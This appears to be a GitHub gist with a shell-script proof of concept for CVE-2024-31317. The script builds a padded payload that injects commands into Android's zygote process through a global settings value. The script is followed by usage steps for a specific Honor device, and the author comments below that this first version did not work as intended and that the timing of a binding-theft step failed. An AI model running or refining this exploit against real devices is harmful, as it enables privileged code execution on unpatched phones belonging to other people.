Created
July 3, 2024 03:40
-
-
Save rabits/eef4fad0bd024786a3afde2bc1f32b7e to your computer and use it in GitHub Desktop.
CVE-2024-31317 PoC 1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317: | |
| # https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html | |
| # | |
| # Tested on honor-magic-v2_ver-n49; Build 7.2.0.108(C636E1R2P2); Sec patch Dec 1, 2023 | |
| # | |
| # USAGE (android 13, with pre-13 use 12200 instead of 32768) | |
| # host$ adb push payload.sh /sdcard/ | |
| # host$ adb shell | |
| # shell$ settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 sh -c 'sleep 200')" | |
| # [disconnect (zygote crash)] | |
| # host$ adb shell | |
| # shell$ ps -A | grep sleep | |
| # root 480 2 0 0 0 0 S [adspsleepmon-wo] | |
| # root 20055 19988 11122152 3792 0 0 S sleep | |
| buffer_size=$1 | |
| shift | |
| zygote_read_abort_size=$1 | |
| shift | |
| cmd_len=$# | |
| cmd="$1" | |
| shift | |
| prefix="6 --set-api-denylist-exemptions " | |
| prefix_len=$(echo -n "$prefix" | wc -c) | |
| add_chars=$(($buffer_size - $prefix_len - 1)) | |
| payload=$(printf "\n\n\n\n\n%${add_chars}s" $cmd_len | tr ' ' A) | |
| echo | |
| for arg in "$@"; do | |
| payload="$payload\n$(echo "$arg")" | |
| done | |
| payload="$payload\n$(echo "$cmd")" | |
| echo "$payload" | |
| payload_len=$(echo "$payload" | wc -c) | |
| add_chars=$(($zygote_read_abort_size - ($prefix_len + $payload_len))) | |
| printf "%${add_chars}s" ',' | tr ' ' ',' | |
| echo X |
Author
Hi @diabl0w , this the first iteration (PoC1) - works not as I expected. Better check the second one by the link above. In this one I thought that sh sleep is actually caused by my payload, but nope it's caused by some init scripts of android itself...
Okay thanks for the clqrif8cation, I figured that mightve been the case... okay I'll have to try out the v2 and see what I could come up with
Author
I think the issue is mostly in timings - so the legitimate app need to be transferred to zygote in the time of the imposter to get back to system to steal it's binding. But I was unable to get to this point...
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi @diabl0w , this the first iteration (PoC1) - works not as I expected. Better check the second one by the link above. In this one I thought that sh sleep is actually caused by my payload, but nope it's caused by some init scripts of android itself...